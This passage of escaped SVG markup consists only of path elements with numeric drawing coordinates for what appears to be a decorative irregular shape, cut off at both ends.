d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.